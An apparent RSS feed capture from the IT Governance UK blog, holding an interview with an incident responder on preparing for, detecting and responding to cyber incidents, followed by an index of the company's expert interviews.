You searched for gdpr - IT Governance UK Blog https://www.itgovernance.co.uk/blog Our Expertise, Your Peace of Mind Fri, 31 May 2024 08:23:58 +0000 en-GB hourly 1 https://www.itgovernance.co.uk/blog/wp-content/uploads/2023/02/cropped-IT-Governance-logo512-32x32.png You searched for gdpr - IT Governance UK Blog https://www.itgovernance.co.uk/blog 32 32 A Practical Guide to Cyber Incident Response https://www.itgovernance.co.uk/blog/a-practical-guide-to-cyber-incident-response https://www.itgovernance.co.uk/blog/a-practical-guide-to-cyber-incident-response#respond Fri, 24 May 2024 14:02:35 +0000 https://www.itgovernance.co.uk/blog/?p=46452 Expert insight from our cyber incident responder Cyber attacks and data breaches are a matter of when, not if. No single measure is 100% foolproof. A determined attacker will always be able to find their way around your defences, given enough time and resources. Furthermore, as Vanessa Horton, our cyber incident responder, pointed out in an interview about anti-forensics: The cyber world is changing all the time, which means we’re playing a bit of a cat-and-mouse game. Basically, as one side improves, so does the other. In this interview, I pick her brain on cyber incident response more generally, gaining

The post A Practical Guide to Cyber Incident Response appeared first on IT Governance UK Blog.

]]>
Expert insight from our cyber incident responder

Cyber attacks and data breaches are a matter of when, not if.

No single measure is 100% foolproof. A determined attacker will always be able to find their way around your defences, given enough time and resources.

Furthermore, as Vanessa Horton, our cyber incident responder, pointed out in an interview about anti-forensics:

The cyber world is changing all the time, which means we’re playing a bit of a cat-and-mouse game. Basically, as one side improves, so does the other.

In this interview, I pick her brain on cyber incident response more generally, gaining her expert insight into the ‘what’, ‘how’ and ‘why’, along with practical, real-life examples.


About Vanessa Horton

Vanessa holds a degree in computer forensics, as well as a number of cyber security and forensics qualifications.

She’s worked for the police as a digital forensics officer, where she was involved in complex crime cases. Vanessa was also awarded a Diamond Award and an Excellence in Service Delivery Award.

Now, she’s part of our cyber incident response team, helping clients with their cyber security requirements.


In this interview


Cyber incident response misconceptions

What common misconceptions do you see around cyber incident response? Or in your line of work generally?

The big one is the [misplaced] belief that ‘it’s not going to happen to us’. Many organisations believe they won’t suffer a cyber incident, even if other organisations might.

That’s a poor mindset to have because, for one, it’s wrong – everyone will suffer an incident at some point.

But more importantly, this mindset leaves organisations unprepared for when they do suffer that breach, and haven’t got an incident responder on hand to keep the damage to a minimum.

The fact that some big names have ‘been done’ recently shows how nobody’s safe. Not even big cyber threat actors! For example, not so long ago, LockBit [an infamous ransomware gang] got taken down. And various other ransomware groups, including Ragnar Locker and Black Basta, suffered the same fate.

It just goes to show that no one’s above being successfully attacked. That’s just the unfortunate reality.

But if threat actors are being brought down, doesn’t that improve the cyber landscape?

Oh, law enforcement doing its job is definitely a good thing.

However, when you bring one website or gang down, what always happens is that the remaining gang members form a new group.

Law enforcement never catches every single member of the gang when it takes one down. So, the ones who remain are going to take their skills and form new groups.

They might then change their objectives and go after new targets – because they’ll want to establish themselves as that new group.

What do you mean by ‘changing their objectives’?

So, for example, LockBit originally said it wasn’t going to go after hospitals for ethical reasons – perhaps ironic for a criminal gang, but there you go.

Anyway, LockBit changed, and is now going after hospitals.

This adds to my earlier point: you simply don’t know who’s going to be targeted next. And just because one group said it won’t target your industry, doesn’t mean other groups will offer the same courtesy. Plus, you have no way of knowing what any group’s next move will be.

This, by the way, is the type of conversation I often have with clients. It’s how I convince them that they really need that cyber incident response plan, to do tabletop exercises, to train their staff, and so on.

By being open and honest about these things, I can more easily show clients that taking these actions is in their own best interests.

Every organisation should prepare for an incident. They must actively take steps to protect themselves. Because if they don’t, well… We’re all human, and when faced with an unexpected situation like a security incident, you’re going to panic, no matter what.

But by being prepared, you can recover quicker, which makes the company financially better off, as you’ll suffer less disruption. You can also quickly stop the attacker from accessing any further data in your systems, so things don’t get any worse.

Plus, by handling an incident well, stakeholders and the public at large are generally more forgiving, which will obviously serve your reputation well.



Interviewer note: If you did everything you could, people are forgiving about breaches

Louise Brooks, head of consultancy at our sister company DQM GRC, made a similar observation in a recent interview about practical GDPR [General Data Protection Regulation] compliance:

“Organisations must remember that real, living people are behind the vast quantities of information they’re gathering and processing. Those people will be affected if anything goes wrong due to mismanagement of their data.

“However, people are generally open to forgiving organisations when things go wrong if the organisation can demonstrate they treated personal data with the respect that it deserves, and they did the best they can.”


Protection – first steps, simple measures

What are the first steps for organisations to protect themselves?

Before you do anything else, you need to know what you’re defending:

  • What are your key assets among your:
    • Data?
    • Systems?
    • Processes?
  • Where are those assets?
  • What are the risks to them?
  • What controls do you already have in place?

Risk assessment and management are critical starting points, as you need to know what you’re working with before you do anything else. But, as my colleague Andrew Pattison likes to say, it’s important to keep these simple.

The key is to identify your biggest risks, then implement appropriate controls to mitigate them.

What are some simple measures every organisation needs?

Very basic controls can get you a long way:

  • Strong passwords and MFA [multifactor authentication]
  • Anti-malware software
  • Secure configuration
  • Regular patching
  • Firewalls

Not doing these types of things just makes you a more likely target. I don’t like using the word ‘easy’, but that’s what you’re making yourself if you don’t patch or you use passwords like ‘Password123’: an easy target. You’re leaving the door wide open to threat actors.

This also underlines the importance of prevention and detection. Cyber incident response planning doesn’t start with the response – any response is only triggered if you detect abnormalities.



Detection – security monitoring and what is ‘normal’?

How do you detect an anomaly or a suspicious event?

You need to understand your baseline: what’s normal? Because if you can’t answer that, how will you know what is suspicious?

Is it normal if someone logs in from a Russian IP address, for example? And at 1:00 am?

But you don’t need to have someone sit there and monitor all event logs all the time – a security monitoring solution can do that for you, like:

  • An IPS [intrusion prevention system];
  • An IDS [intrusion detection system]; and/or
  • An EDR solution [endpoint detection and response].

You also want systems that log system activity and forward them to a centralised SIEM solution or SOC [security information and event management, security operations centre].

These types of technological solutions are essential to process huge amounts of information [security events like access logs]. But the human aspect is a vital part of detection, too.

For one, a person will have to ‘teach’ your technological solution what constitutes abnormal behaviour. And two, when your tool detects something suspicious, it must alert a human to follow up on it.


Interviewer note: Automating log analysis with AI

Earlier this year, I spoke to information security manager Adam Seamons about network security. Automated security monitoring tools cropped up, as did the role of AI and machine learning in security:

“AI and machine learning have both been used in detecting anomalies and suspicious patterns for some time, and will only continue to be used more. I expect SOCs to become increasingly reliant on AI.

“Getting more specific, log analysis is a key area for AI to automate. An AI tool could do the heavy lifting, sifting through tons of logs and data to detect and then respond to threats far faster than a human could.”


You gave a 1:00 am login as an example. Does a situation like that require an immediate follow-up?

Good question. Many organisations incorrectly believe that they don’t need 24-hour cover – or at least, don’t need to make someone responsible for responding to an out-of-hours alert from an automated tool.

But things are going to happen overnight. Look at it from the threat actor’s point of view. A smart attacker is going to attempt to breach your systems when they’re at their most vulnerable – i.e. when nobody’s looking.

Organisations are prone to forgetting about out-of-hours protection, but that’s precisely when you most need protection. That’s when you’re more likely to get attacked. Threat actors know that’s when defences tend to be down, and monitoring is slack.

What exactly should organisations be monitoring?

Security events. These are just everyday events on your systems or networks – logins, incoming emails, files received, and so on.

So, for example, if you suddenly get someone logging in from Russia, and they weren’t on a business trip there or something, you need to investigate. This means you’re not just tracking the logins themselves, but also certain information about them – locations and IP addresses, login times, files or services accessed, and so on.

Again, you have to know your baseline. What is expected activity? And if it’s unexpected, someone must quickly investigate. If a threat actor did gain access to a user’s account, you want to prevent them from accessing anything else.

Equally, if it’s just someone who’s on holiday in Russia and decided to log in, you can dismiss the security event. But you must establish that in your initial follow-up; you can’t just assume it’s not a security incident.

[The difference between a security event and a security incident is that an event is an everyday occurrence – like users logging in. But some events also signify a security incident: a breach of confidentiality, integrity and/or availability, also known as the ‘CIA triad’.]

To what extent does seasonality play a role in security monitoring? Like weekdays vs weekends, for example, or Black Friday?

Oh, seasonality plays a role, for sure. Black Friday is the perfect example.

If you’re a retailer, you’re going to see way more web traffic than usual. You must be able to handle that. By having more people on call, for example. By double-checking things. You need to plan ahead and assess the risks.

Again, a smart threat actor will target your weakest link, and when you’re at your most vulnerable. So, if they wanted to take your website down, for example, with a DoS attack [denial of service], a day like Black Friday is a prime time to target, when traffic is up anyway, and it’ll take fewer additional requests to flood your servers.

Black Friday is also a great time [from the attacker’s perspective] to cause most harm. If your website isn’t operating that day, you’ll take a massive financial hit in terms of lost sales.



Threat types and risk assessment

DoS attacks aside, what other cyber threats or attack types must organisations consider?

Take your pick:

  • DoS
  • Phishing
  • Ransomware
  • DNS poisoning
  • Backdoor attacks

Ultimately, a lot of them involve malware, but threat actors can deliver it in many different ways. The more important thing to think about is where and when you’re most vulnerable. Black Friday is one example. The end of your financial year is another, when you’re dealing with tons of confidential information.

You’re not just looking at who might target you and how, but also when you’d suffer the biggest blow. When would the impact of a security incident be at its worst? [I.e. business impact analysis.]

And OK, not every attacker will think that way. But this question is one every organisation should consider, because you want to be operational during your most critical times. Even if the cause of a disruption wasn’t malicious, you don’t want it to happen – and especially not at a time when disruption would be costly.

How can organisations balance the cost of such assessments and measures against the risk of an incident or a disruption?

That’s always the challenge, especially for smaller organisations. Everyone needs to find that balance and make those difficult choices.

To help make them, ask questions like:

I think of this as a gap assessment, which can be against a standard like ISO 27001 or NIST SP 800-53. I’ve found that many organisations particularly like the NIST incident response guidance because it’s so accessible.



Interviewer note: The core principles behind cyber resilience and defence in depth

Vanessa covered the core ideas behind the three broad layers of cyber defence in depth:

  1. Prevention
  2. Detection
  3. Response

The core idea behind prevention is risk assessment. Identify your threats and weaknesses, and where and when your business would most suffer from a cyber incident, then implement measures to mitigate the risks as best you can. Concentrate on the more basic, cost-effective measures – like firewalls and patching – that prevent most common attacks.

The core idea behind detection is that preventive measures can fail. As Vanessa said to me: “They can only do so much.” You can think of the cyber security world as a ‘cat-and-mouse game’ in which the ‘cat’ (attacker) has the upper hand. Besides, there’ll always be zero-day exploits.

So, you want to become aware – as quickly as possible – of when your prevention failed. The key here is to know what ‘normal’ looks like, so you can identify abnormal behaviour, potentially indicating a cyber security incident.

Let’s get deeper into response: the follow-up to when your tools flag up an anomaly.


Cyber incident response plan

What’s the first step in planning your response?

Your cyber incident response plan. No doubt about it.

Incident response planning is such a vital part of having an effective response overall. As I said earlier, we’re human – panic is natural in unexpected situations. Even if you are prepared!

But preparing and documenting a solid response plan – an incident action plan, if you like – ensures that even when under pressure, people do the right things. They make all the right decisions, because they were made ahead of time, outside the heat of the moment.

A good security incident plan should also ensure that your approach is consistent, even if a key person is unavailable.

How can organisations further improve their cyber incident response plan?

Your incident response plan should include a different incident response playbook for different threats. Dealing with malware on your systems requires a different response than, for example, a DoS attack.

Also, test your plan. Tabletop exercises are important – they tell you whether your plans are working as intended. Plus, they make for valuable training for staff! It’s always much easier to do something if it feels familiar.

[Note: Vanessa gave an example of this below.]



Training – specialist skills and when to outsource

What training do staff with incident response roles or responsibilities need?

That depends on the individual’s role in the team.

Cyber incident response isn’t an IT issue, but a business issue requiring input from a wide range of stakeholders.

At a minimum, training should include:

  • What constitutes an incident;
  • Responsibilities during an incident response;
  • Activities for ensuring compliance with legal requirements;
  • How, when and to whom an incident should be escalated; and
  • How to handle, store and process evidence in a forensically sound manner.

Is that a common issue? Not recognising something as a potential incident?

We do often see that. Different people in an organisation have different opinions on the definition of an incident.

In many situations, differing views are great. But in the context of incident response in cyber security, the organisation needs to ensure a consistent definition and approach, so staff training can cover it clearly.

You need to teach people how to recognise the abnormal stuff. And to put in a security incident report to someone adequately trained. Whoever triages must know both what to look for and how to handle it securely, to ensure the organisation is taking the right actions from the start.

When is it better to have or develop that technical expertise internally, and when is it better to outsource?

It depends on:

  • Your organisational size;
  • The complexity of your systems; and
  • Your internal capabilities.

If you’re a smaller organisation, it’s unlikely you have the internal capability. More complex organisations would probably also benefit from outsourcing all or some of the capabilities – digital forensics, for example.

Using external expertise also means relying on people for whom responding to an incident is an everyday occurrence. They’ll know exactly what actions to take, and won’t allow their skills to become rusty. In fact, they make a point of keeping up with industry news and trends.

That’s completely different from an internal capacity, whose day to day likely involves other tasks. That makes them less comfortable dealing with an exceptional situation like a security breach.

What skills are specific for incident response? That an internal person is unlikely to use day to day?

Again, keeping up with, and having a deep understanding of, the latest threats. That gives them the ability to quickly detect and respond to these threats.

More specialist capabilities include:

  • Digital forensics [discussed below];
  • Malware analysis; and
  • Threat hunting.

These often require expensive training and significant effort to keep up, as the latest approaches keep evolving.

In fact, due to cost, these are often – unfortunately – not conducted in cyber incident response.

This is a mistake. If you don’t understand what happened, how it happened and when it happened, it makes the incident response procedure much more challenging. It’s not enough to just get your business up and running again.

Do you have a real-world example?

We had a client that had been compromised with ransomware. They decided not to pay – which I think is best in most cases – and restored all their services without investigating the root cause.

They got done a second time just two weeks later, by the same threat actor, wiping everything out again. After which they contacted us.

Anyway, it makes the point: you must understand and remediate the initial vulnerabilities before declaring the incident response complete:

  • Investigate how the attackers got into the environment.
  • Check for back doors and persistence mechanisms, such as scheduled tasks, new users, new processes, and so on.

Ensure you’ve closed your vulnerabilities, or you’ll get done again. Possibly by the same attacker.

Ending up back where you started is hugely disruptive. Not only that – the financial and reputational impacts are massive, too. Journalists love writing about the ones attacked twice in a short period. Akumin at the end of last year is a good example.

Can you share any other real-world examples?

We had a client that kept getting phishing emails, with staff repeatedly falling for them, clicking the links and typing in their credentials. This suggested a fault with their staff training, and that their email filters weren’t robust enough.

In a scenario like that, you want to stop the threat actor gaining further access to anything, but also prevent this from happening over and over again.

It means figuring out the root cause. Getting an answer to why this keeps happening. Which means asking:

  1. Why are so many phishing emails coming through? Why aren’t they stopped?
  2. Why do staff keep falling for them?

Without addressing these, you’re going to keep suffering the same incident. That’s clearly bad for business – financially, operationally and reputationally.

So, a part of incident response resources should go towards resolving this incident, and part towards future prevention. But, of course, had this organisation invested in better training and filters to begin with, they wouldn’t have had to spend all that money after the fact.



Want to get future interviews – and other blogs – like this straight to your inbox? Subscribe to our free weekly newsletter: the Security Spotlight.


Common incident response errors

What’s the first step when responding to a cyber security incident?

Step one is always to confirm whether the incident is real, and if so, to determine the scope and potential impact.

It’s fine if you can’t answer all questions to start with – that’s normal. But as the investigation progresses, you must keep reevaluating your situation and risks.

You may also have to report the incident, often within just 72 hours, under legal obligations like:

  • The GDPR [General Data Protection Regulation];
  • The PCI DSS [Payment Card Industry Data Security Standard];
  • The NIS Regulations [Network and Information Systems Regulations]; and/or
  • DORA [Digital Operational Resilience Act].

What else should organisations do during the first stage of their response?

Isolate the compromised device and/or network segment from the rest of the environment to prevent further damage.

Also, if the device is already on, do not power it off.

I remember an exchange during a tabletop exercise that focused on digital forensics:

  • Someone said: “I’ll just power off the machine.”
  • I exclaimed: “No, no, no! Stop!”
  • Everyone just stared at me. Someone asked, completely puzzled: “Why?”
  • I explained that I couldn’t reveal the rest of the scenario to them at that stage, but did say that if they turned off that machine, they’d lose vital evidence.

They were about to lose critical evidence only stored in the RAM [the device’s memory]. Once you power off your machine, you permanently wipe that memory.

You see, some malware only runs in the memory, with very few artifacts stored on the hard drive. That limits what we can discover during any forensic investigation. Sometimes, the memory also stores ransomware decryption keys.

[However, if your device is already powered off, don’t switch it on. That makes changes to the system that could overwrite logs or other evidence.]

A lot of people think they’re doing the right thing by turning off their infected machine, when they should only disconnect it from the network. This comes back to training.

You’ve got to train people, particularly on those stages that happen before an external specialist would come on the scene. A key part of that is to not lose evidence. That’s something staff must be trained to do.

Turning off your machine is very instinctive. It’s the classic IT solution: rebooting your PC solves a lot of problems. But doing the right thing in this scenario isn’t difficult – you just have to know what the ‘right’ thing is. What are some other common errors that are easy to correct with basic awareness?

A common one is people simply deleting phishing emails. They just assume that IT already knows about it, or that someone else will report it.

But no: we all have a part to play in security, and clicking that ‘Report Message’ button in Outlook takes seconds – everyone’s got time to do that. And it may just save your organisation a lot of money.

Another thing is to keep your list of contacts and plans up to date. And to keep copies independent of your connected systems.

This might sound too obvious, but I’ve seen it so many times: people suffer an incident, they can’t get to their files, and then realise that they don’t know who to call, and haven’t got a way of easily finding out.

In short, keep a printed copy of your computer incident response plan, or save the contacts on your phone or something – and keep these copies up to date – so you can get in touch with the right people quickly, should you suffer an ICT disruption.



Digital forensics

Let’s come back to digital forensics. What does that involve?

A digital forensics investigation aims to answer questions like:

  • How and when did the threat actors gain access?
  • What did the threat actors do once they got into the IT environment?

Any digital forensic investigation should be conducted by someone who is trained to do so, because of the evidence aspect again. Any evidence an investigator uncovers might be used in future prosecutions.

The output of this investigation may also lead to follow-up actions such as malware analysis or threat hunting. That’s proactively looking for undetected threats in the network.



Incident response process

Walk me through the next incident response steps. What happens after you isolate the device and conduct a forensic investigation?

I should point out that device isolation isn’t the only thing you might need to do to contain the incident.

Maybe you need to isolate a critical service while the investigation is ongoing. Or you need to engage with third-party providers, such as Cloud service providers, which could give you access to vital logs or isolate the service for you – things like that.

Those initial stages, like the forensic analysis, will inform how you contain the situation and what the next steps should be.

What’s the next step in the incident response process, after containment?

Eradication and recovery. That can involve replacing or rebuilding compromised systems, which takes time and may impact legacy applications.

That process may include, but definitely isn’t limited to:

  • Restoring and securing base systems;
  • Restoring data from backups [following verification of integrity]; and
  • Scanning for known vulnerabilities.

Also, we test any recovered systems for functionality and security before reintroducing them into the IT environment.

Once reintroduced, we monitor them for a period – ideally, at least a week – to make sure the threat actors haven’t returned.

The indicators of compromise discovered during the investigation help inform us what suspicious activity we’re monitoring for. For example:

  • Specific network connections from suspicious IP addresses or domains;
  • Running applications and related services; and
  • Compromised user accounts.

What’s the next step in the incident response life cycle, after recovery?

Once you’re satisfied that you’ve fully remedied the situation, do a post-incident review:

  • What happened?
  • How did it happen?
  • What was the impact?
  • What went well in the response?
  • What could have gone smoother?
  • How can we improve for next time?

In short, establish and implement the lessons learned. This will only improve your ability to protect against, detect and respond to future cyber security incidents.

Should that sort of information also be shared externally?

Yes! Again, we all have a part to play when it comes to cyber security – not just within an organisation, but also in the wider community.

So, it’s important to contribute to threat intelligence. For example, take the ransomware attack on the British Library last year. It released a report to the public afterwards, which talks about what happened, how it happened and what the Library learned from it.

I love this sort of thing, because it shows so clearly that you’re taking cyber security [and cyber security incident response] seriously. You’re holding yourself accountable and being transparent.

Also, by publishing something like this, you’re helping other people. It shows that you’ve done your best.

Most people find it far easier to trust an organisation being open about what happened and what they’ve done about it, than an organisation trying to cover things up.

Don’t be like 23andMe, only admitting to things when forced to and blaming the victims to boot. It just makes you wonder what’s really going on, and question the company’s respect for its customers. PR is a big part of security incident management, too!


Find out how we can help

We take a pragmatic approach to assessing and managing your incident response needs. We align standards and best practices with your operational and business requirements.

Talk to us today to see how we can help you.


We hope you enjoyed this edition of our ‘Expert Insight’ series. We’ll be back soon, chatting to another expert within GRC International Group.

In the meantime, why not check out our previous interview with Vanessa on anti-forensics?

If you’d like to get our latest interviews and resources straight to your inbox, subscribe to our free Security Spotlight newsletter. Alternatively, explore our full index of interviews here.

The post A Practical Guide to Cyber Incident Response appeared first on IT Governance UK Blog.

]]>
https://www.itgovernance.co.uk/blog/a-practical-guide-to-cyber-incident-response/feed 0
Free Expert Insights: Index of Interviews https://www.itgovernance.co.uk/blog/free-expert-insights https://www.itgovernance.co.uk/blog/free-expert-insights#respond Fri, 24 May 2024 10:14:00 +0000 https://www.itgovernance.co.uk/blog/?p=46213 At least once a week, we sit down with an expert from within the Group to get their insights on a technical topic or business area. Here are all our Q&As to date, grouped by broad topic: AI Cyber attacks and data breaches Cyber Essentials Cyber resilience Cyber security Data privacy DORA Europrivacy Incident response ISO 27001 PCI DSS PECR Security testing Supply chains Training Miscellaneous To get new expert insights straight to your inbox, sign up to our weekly newsletter, the Security Spotlight. Last updated: 24 May 2024. Interviews added: Camden Woollven on privacy and ethical concerns around AI

The post Free Expert Insights: Index of Interviews appeared first on IT Governance UK Blog.

]]>
At least once a week, we sit down with an expert from within the Group to get their insights on a technical topic or business area.

Here are all our Q&As to date, grouped by broad topic:

To get new expert insights straight to your inbox, sign up to our weekly newsletter, the Security Spotlight.


Last updated: 24 May 2024. Interviews added: Camden Woollven on privacy and ethical concerns around AI (AI); Kirsten Craig on the APRA (data privacy); Vanessa Horton on cyber incident response (incident response); and Matthew Peers on ISO 27001 and physical security (ISO 27001). 


AI

Camden Woollven on privacy and ethical concerns around AI 

22 May 2024 

Head of AI Camden talks us through the ethical principles for guiding AI development, how those principles relate to data privacy, high-risk domains (such as healthcare), and why AI ethics requires a team effort in this interview

Mark James on AI and data protection 

11 April 2024

Privacy consultant Mark talks about the data protection risks of AI, the GDPR’s (General Data Protection Regulation) restrictions around automated decision-making, legal bases for processing personal data via AI systems, and how to address the risks from that type of processing in this interview.

Mark James on voice cloning

23 February 2024

What is voice cloning, what are the associated risks, and what can organisations do to protect themselves? Privacy consultant Mark answers all these questions and more in this interview.


Cyber attacks and data breaches

Leon Teale on the mother of all breaches

24 January 2024

Senior penetration tester Leon talks us through the implications of a historic 26-billion-records leak. Learn why even old credentials can cause a lot of damage, and how you can protect yourself in this interview.


Cyber Essentials

Ashley Brett on Cyber Essentials and ISO 27001

10 May 2024

Cyber security advisor and product evangelist Ashley talks us through some common Cyber Essentials misconceptions, key differences between Cyber Essentials and ISO 27001, the benefits of each, and things to consider if you’re implementing both in this interview.

Ashley Brett on Cyber Essentials solutions

21 February 2024

Cyber security advisor and product evangelist Ashley provides a simple overview of the Cyber Essentials scheme. He also talks us through various Cyber Essentials solutions to help you choose the right one in this interview.


Cyber resilience

Adam Seamons on cyber defence in depth

19 April 2024

What is defence in depth, why is it important and how does it work? Information security manager Adam answers all these questions and more, giving practical, expert insight into defending against malware in multiple layers, with details on the purpose of each, in this interview.

Alan Calder on cyber resilience

24 November 2023

Group CEO Alan gives us a quick overview of his award-winning book: Cyber Resilience – Defence-in-depth principles. He also explains why defence in depth is so important in this interview.


Cyber security

Leon Teale on zero-day exploits

24 April 2024

What are zero-day exploits and who is most at risk? How can we detect zero-day vulnerabilities and attacks, and protect ourselves from them? Plus, how much of an outlier was the MOVEit Transfer breach? We put all these questions and more to senior penetration tester Leon in this interview.

Adam Seamons on zero-trust architecture

5 January 2024

Information security manager Adam gives us a short history lesson about how networks have evolved, and the security consequences of that evolution. In particular, he highlights the risks of Cloud infrastructure and the merits of zero-trust architecture in this interview.

Vanessa Horton on ransomware trends

20 November 2023

Cyber incident responder Vanessa shares recent ransomware trends, why they’re worrying, and what organisations can do about them in this interview.

Leon Teale on secure remote working and VPNs

23 October 2023

Senior penetration tester Leon gives us his top 10 tips for secure remote working. He also talks us through different VPN (virtual private network) technologies in this interview.


Data privacy

Kirsten Craig on the APRA 

17 May 2024 

In the US, expectations are – cautiously – rising that we could see a landmark single federal privacy standard enacted into law: the APRA (American Privacy Rights Act). Data privacy lawyer Kirsten takes us through what it is, its requirements, its interplay with state-specific laws, its scope, and the next steps in this interview.  

Ryan Peeney on records of processing activities

9 May 2024

Records of processing activities, also known as ‘ROPAs’, are an explicit legal requirement in Article 30 of both the UK and EU GDPR. But what exactly are they? Why are they important, and what are their benefits? And how can you create and maintain them? We put all these questions and more to DPO (data protection officer) consultant Ryan in this interview

Louise Brooks on practical GDPR compliance

25 April 2024

Numerous misunderstandings surround complying with the GDPR. As a principles- and risk-based law, there aren’t prescribed dos and don’ts – the Regulation simply provides a framework for compliance. Furthermore, compliance can be a business enabler, not a ‘necessary evil’. Head of consultancy at DQM GRC Louise explains further in this interview.

Ola Irukwu on biometric data

11 April 2024

DPO consultant Ola talks us through biometric data – what is it, and how do the GDPR’s principles and requirements apply to it? She also explains the importance of DPIAs (data protection impact assessments) and data protection by design in this interview.

Mark James on data seeding

22 March 2024

Privacy consultant Mark explains what data seeding is, why it’s such an unintrusive measure, and when and how to use it in this interview.

Louise Brooks on staff monitoring

4 March 2024

How much and what type(s) of staff monitoring is too much? How can organisations monitor staff while remaining compliant with privacy laws? Head of consultancy at DQM GRC Louise gives us the answers in this interview.

Alan Calder on maintaining GDPR compliance

16 February 2024

Group CEO Alan takes us through what data privacy and GDPR compliance trends he foresees in 2024. He also gives us his 5 top tips for remaining compliant in this interview.

Andrew Snow on a landmark GDPR ruling

12 January 2024

The ECJ (European Court of Justice) issued a landmark GDPR ruling in December 2023. Data privacy and cyber security trainer Andrew takes us through the details, and explains why this ruling is so important in this interview.

Andrew Snow on the UK–US data bridge

6 November 2023

The UK and US received an adequacy decision enforced in October 2023. Data privacy and cyber security trainer Andrew talks us through the practical implications, how organisations can take advantage, and alternative mechanisms for UK–US data transfers in this interview.


DORA

Andrew Pattison on DORA, how it compares to NIS 2, and how it’ll be regulated

3 May 2024

What is DORA (Digital Operational Resilience Act)? How does it differ – or overlap – with NIS 2 (Network and Information Security Systems Directive)? What are the DORA pillars? How will DORA be regulated? And will non-EU organisations have to comply with it? We put these questions to Andrew, head of GRC (governance, risk and compliance) consultancy at IT Governance Europe, in this interview

Andrew Pattison on simplifying DORA compliance with ISO 27001

26 January 2024

ISO 27001 can be used to simplify compliance with DORA. Head of GRC consultancy at IT Governance Europe Andrew explains how in this interview.

Cliff Martin on streamlining DORA compliance

18 December 2023

DORA’s requirements aren’t too dissimilar to that of other legislation and standards. Head of cyber incident response Cliff explains how to streamline DORA compliance in this interview.

Alan Calder on DORA supply chain security

11 December 2023

Group CEO Alan explains why supply chain security – a key DORA pillar – is so important, and how organisations can secure their supply chain in this interview.

Cliff Martin on DORA incident response

28 November 2023

Head of cyber incident response Cliff takes us through DORA’s incident response requirements – another pillar of the Regulation – in this interview.

Andrew Pattison on DORA risk management

13 November 2023

Head of GRC consultancy at IT Governance Europe Andrew explains the most important DORA pillar: ICT risk management. He talks us through the Regulation’s requirements and how organisations can meet them in this interview.


Europrivacy

Alice Turley on the Europrivacy scheme and certification

26 April 2024

What is Europrivacy™, who can apply for certification, and what are the benefits? How do the scheme and certification work? And what must applicants consider when choosing a consulting company? Senior privacy and GRC consultant and trainer Alice answers all these questions in this interview.


Incident response

Vanessa Horton on cyber incident response 

24 May 2024 

Cyber incident responder Vanessa gives us a complete, practical overview of cyber incident response. She talks us through common misconceptions and errors, threat types, protection, detection, cyber incident response plans, training, digital forensics and the incident response process. She also covers real-life examples in this interview

Vanessa Horton on anti-forensics

2 February 2024

Criminals use anti-forensics techniques to try to remain undetected and/or mask their actions. Cyber incident responder Vanessa explains further, and provides examples of anti-forensics techniques as well as advice for how organisations can protect themselves, in this interview.


ISO 27001

Matthew Peers on ISO 27001 and physical security 

15 May 2024 

When we hear ‘information security’ or ‘ISO 27001’, we usually think ‘cyber security’. However, physical security is also an important aspect of information security. In fact, in ISO 27001:2022, ‘physical’ is one of just four control themes. GRC consultant Matthew explains why, and talks us through physical access control, physical security monitoring, CCTV, and more in this interview

Alan Calder on transitioning to ISO 27001:2022 

10 April 2024

Group CEO Alan explains why ISO 27001 and ISO 27002 were updated in 2022. He also talks us through key changes and transition dates, and how to approach your transition project in this interview.

Alan Calder on ISO 27001 and defence in depth

20 March 2024

Group CEO Alan explains how ISO 27001 and defence in depth intersect, and the importance of each. He also talks us through the ISO 27000 family of standards, and how ISO 27001 can help organisations meet their regulatory requirements in this interview.

Alan Calder on the ISO 27001:2022 addendum and ISO 27006 update

15 March 2024

ISO 27006 was recently updated. An ISO 27001:2022 addendum was also recently released. Group CEO Alan gives us the highlights of both updates, as well as an overview of the business benefits and regulatory value of ISO 27001, in this interview.

Andrew Pattison on pragmatic ISO 27001 risk assessments

8 March 2024

ISO 27001 fundamentally takes a risk-based approach. Head of GRC consultancy at IT Governance Europe Andrew gives us his tips on how to keep your risk assessments simple and manageable in this interview.

Alan Calder and a quick overview of ISO 27001

6 March 2024

Group CEO and ISO 27001 pioneer Alan gives us a quick overview of the business benefits of ISO 27001. He also talks us through how the Standard can aid regulatory compliance, and offers tips on risk assessment and continual improvement in this interview.


PCI DSS

Stephen Hancock on PCI DSS SAQ SPoC

30 October 2023

QSA (Qualified Security Assessor) consultant Stephen gives us an overview of the latest PCI DSS SAQ (Payment Card Industry Data Security Standard self-assessment questionnaire): SAQ SPoC (software-based PIN entry on COTS). He explains which organisations qualify and how SPoC solutions work in this interview.


PECR

Louise Brooks on cookie compliance

19 January 2024

Head of consultancy at DQM GRC Louise shares how organisations can improve their cookie banners without hampering their business objectives, and common mistakes around obtaining valid consent, in this interview.

Louise Brooks on the ICO’s ultimatum on cookies

4 December 2023

The ICO (Information Commissioner’s Office) gave the UK’s top websites an ultimatum: get your cookies compliant, or risk enforcement action. Head of consultancy at DQM GRC Louise gives her insights into this ICO statement and ICO enforcement more generally, and advice on how organisations can best meet their cookie requirements, in this interview.


Security testing

Leon Teale on the CVSS

9 February 2024

The CVSS (Common Vulnerability Scoring System) is now at v4.0. Senior penetration tester Leon explains what the CVSS is, how it works, when to use it, its limitations, and the key changes introduced in CVSS v4.0 in this interview.


Supply chains

Andrew Pattison on simplifying supply chain risk management

5 April 2024

Head of GRC consultancy at IT Governance Europe Andrew explains the importance of keeping risk assessments and supply chain risk management simple, and how DORA might change how organisations manage risk. He also talks us through considerations around risk when outsourcing, e.g. to a Cloud provider, in this interview.


Training

Soji Ogunjobi on CISM®

4 April 2024

Cyber security specialist and instructor Soji gives us a complete overview of CISM (Certified Information Security Manager), talking us through its topics, intended audience, career opportunities, alternatives, and more in this interview.

Damian Garcia on ransomware elearning

7 February 2024

Head of GRC consultancy at IT Governance Damian recently updated our Ransomware Staff Awareness E-learning Course. He explains why this course is so important, the key topics covered, its top take-aways, and more in this interview.


Miscellaneous

Nicola Day on book formats

22 March 2024

Softcover, PDF eBook or ePub? Publications manager Nicola explains the difference between each to help you choose the right written book format for you in this interview.

Sophie Sayer on the IT Governance partner programme

14 February 2024

Head of channel Sophie talks us through the IT Governance partner programme, and the benefits of partnering with us, in this interview.

Andreas Chrysostomou on audiobooks

10 January 2024

Publishing relations manager Andreas explains the audiobook format – including its pros and cons, how audiobooks are developed, and more – in this interview.

Sam McNicholls-Novoa on CyberComply

20 December 2023

CyberComply is a Cloud-based, end-to-end solution that simplifies compliance with a range of cyber security and data privacy standards and laws. Product marketing manager Sam talks us through some of the software’s benefits and features in this interview.


